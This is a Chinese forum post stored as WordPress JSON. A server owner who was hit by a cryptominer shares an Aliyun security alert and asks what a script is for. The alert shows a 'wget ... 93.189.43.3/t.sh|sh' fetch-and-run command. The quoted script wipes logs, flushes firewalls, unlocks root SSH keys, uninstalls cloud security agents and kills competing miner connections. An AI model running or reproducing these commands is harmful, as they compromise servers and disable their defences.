{"id":121078,"date":"2020-06-20T16:30:11","date_gmt":"2020-06-20T08:30:11","guid":{"rendered":"http:\/\/4563.org\/?p=121078"},"modified":"2020-06-20T16:30:11","modified_gmt":"2020-06-20T08:30:11","slug":"%e5%ae%89%e8%a3%85%e9%98%bf%e9%87%8c%e4%ba%91%e7%9b%be-%e6%80%bb%e6%98%af%e6%8a%a5%e6%81%b6%e6%84%8f%e8%84%9a%e6%9c%ac%e6%89%a7%e8%a1%8c","status":"publish","type":"post","link":"http:\/\/4563.org\/?p=121078","title":{"rendered":"\u5b89\u88c5\u963f\u91cc\u4e91\u76fe \u603b\u662f\u62a5\u6076\u610f\u811a\u672c\u6267\u884c"},"content":{"rendered":"\n<p>  \t\t\t\t\t<strong>cnsdwu<\/strong>  \t\t\t\t\u5927\u4f6c\u6709\u8bdd\u8bf4 : \t<\/p>\n<h3>\u5b89\u88c5\u963f\u91cc\u4e91\u76fe \u603b\u662f\u62a5\u6076\u610f\u811a\u672c\u6267\u884c<\/h3>\n<p>  \t\t\u4e4b\u524d\u670d\u52a1\u5668\u88ab\u6302\u4e86\u6316\u77ff\u8f6f\u4ef6 \u91cd\u88c5\u4e86\u4e0b\u7cfb\u7edf<br \/>  \u5b89\u88c5\u4e86\u963f\u91cc\u4e91\u7684agent,<br \/>  \u7136\u540e\u88c5\u4e86amh\u540e\u4e00\u76f4\u62a5 \u6267\u884c\u4e00\u4e2a\u811a\u672c<br \/>  \u90e8\u5206\u62a5\u544a\u4fe1\u606f\u5982\u4e0b<\/p>\n<p>  \u8be5\u544a\u8b66\u7531\u5982\u4e0b\u5f15\u64ce\u68c0\u6d4b\u53d1\u73b0\uff1a<br \/>  \u547d\u4ee4\u884c\uff1ash -c wget -q -O &#8211; 93.189.43.3\/t.sh|sh<br \/>  \u8fdb\u7a0bPID\uff1a7187<br \/>  \u8fdb\u7a0b\u6587\u4ef6\u540d\uff1abash<br \/>  \u7236\u8fdb\u7a0bID\uff1a7186<br \/>  \u7236\u8fdb\u7a0b\u6587\u4ef6\u8def\u5f84\uff1a\/usr\/local\/php-7.4\/sbin\/php-fpm<br \/>  \u4e8b\u4ef6\u8bf4\u660e\uff1a\u4e91\u5b89\u5168\u4e2d\u5fc3\u68c0\u6d4b\u5230\u60a8\u7684\u4e3b\u673a\u6b63\u5728\u6267\u884c\u6076\u610f\u7684\u811a\u672c\u4ee3\u7801(\u5305\u62ec\u4f46\u4e0d\u9650\u4e8ebash\u3001powershell\u3001python)\uff0c\u8bf7\u7acb\u523b\u6392\u67e5\u5165\u4fb5\u6765\u6e90\u3002\u5982\u679c\u662f\u60a8\u7684\u8fd0\u7ef4\u884c\u4e3a\uff0c\u8bf7\u9009\u62e9\u5ffd\u7565\u3002<\/p>\n<p>  \u90fd\u662f\u6307\u5411\u4e00\u4e2a\u811a\u672c\u7684\uff0c\u9ebb\u70e6\u5927\u5bb6\u7ed9\u770b\u4e00\u4e0b\u8fd9\u4e2a\u811a\u672c\u662f\u5e72\u5565 \u662f\u654c\u662f\u53cb<br \/>  \u811a\u672c\u90e8\u5206\u5982\u4e0b<br \/>  #!\/bin\/sh<br \/>  ulimit -n 65535<br \/>  rm -rf \/var\/log\/syslog<br \/>  chattr -iua \/tmp\/<br \/>  chattr -iua \/var\/tmp\/<br \/>  ufw disable<br \/>  iptables -F<br \/>  echo &quot;nope&quot; &gt;\/tmp\/log_rot<br \/>  sudo sysctl kernel.nmi_watchdog=0<br \/>  echo &#8216;0&#8217; &gt;\/proc\/sys\/kernel\/nmi_watchdog<br \/>  echo &#8216;kernel.nmi_watchdog=0&#8217; &gt;&gt;\/etc\/sysctl.conf<br \/>  userdel akay<br \/>  userdel vfinder<br \/>  chattr -iae \/root\/.ssh\/<br \/>  chattr -iae \/root\/.ssh\/authorized_keys<br \/>  rm -rf \/tmp\/addres*<br \/>  rm -rf \/tmp\/walle*<br \/>  rm -rf \/tmp\/keys<br \/>  if ps aux | grep -i &#8216;liyun&#8217;; then<br \/>  curl http:\/\/update.aegis.aliyun.com\/download\/uninstall.sh | bash<br \/>  curl http:\/\/update.aegis.aliyun.com\/download\/quartz_uninstall.sh | bash<br \/>  pkill aliyun-service<br \/>  rm -rf \/etc\/init.d\/agentwatch \/usr\/sbin\/aliyun-service<br \/>  rm -rf \/usr\/local\/aegis*<br \/>  systemctl stop aliyun.service<br \/>  systemctl disable aliyun.service<br \/>  service bcm-agent stop<br \/>  yum remove bcm-agent -y<br \/>  apt-get remove bcm-agent -y<br \/>  elif ps aux | grep -i &#8216;unjing&#8217;; then<br \/>  \/usr\/local\/qcloud\/stargate\/admin\/uninstall.sh<br \/>  \/usr\/local\/qcloud\/YunJing\/uninst.sh<br \/>  \/usr\/local\/qcloud\/monitor\/barad\/admin\/uninstall.sh<br \/>  fi<br \/>  netstat -anp | grep 185.71.65.238 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | xargs -I % kill -9 %<br \/>  netstat -anp | grep 140.82.52.87 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :443 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :23 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :443 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :143 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :2222 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3333 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3389 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :4444 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :5555 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6666 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6665 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :6667 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :7777 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :8444 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :3347 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :14444 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :14433 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %<br \/>  netstat -anp | grep :13531 | awk &#8216;{print $7}&#8217; | awk -F'[\/]&#8217; &#8216;{print $1}&#8217; | grep -v &quot;-&quot; | xargs -I % kill -9 %\t\t\t\t<\/p>\n<p>  \t\t\t\t\t<strong>\u6e05\u98ce\u9080\u660e\u6708<\/strong>  \t\t\t\t\u5927\u4f6c\u6709\u8bdd\u8bf4 : \t<\/p>\n<h3><\/h3>\n<p>  \t\t15\u5206\u949f\u65e0\u56de\u7b54\uff0c\u5e2e\u4f60\u4e00\u628a\t\t\t  <\/p>\n","protected":false},"excerpt":{"rendered":"<p>cnsdwu \u5927\u4f6c\u6709\u8bdd\u8bf4 : \u5b89\u88c5&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[],"tags":[],"_links":{"self":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts\/121078"}],"collection":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=121078"}],"version-history":[{"count":0,"href":"http:\/\/4563.org\/index.php?rest_route=\/wp\/v2\/posts\/121078\/revisions"}],"wp:attachment":[{"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=121078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=121078"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/4563.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=121078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}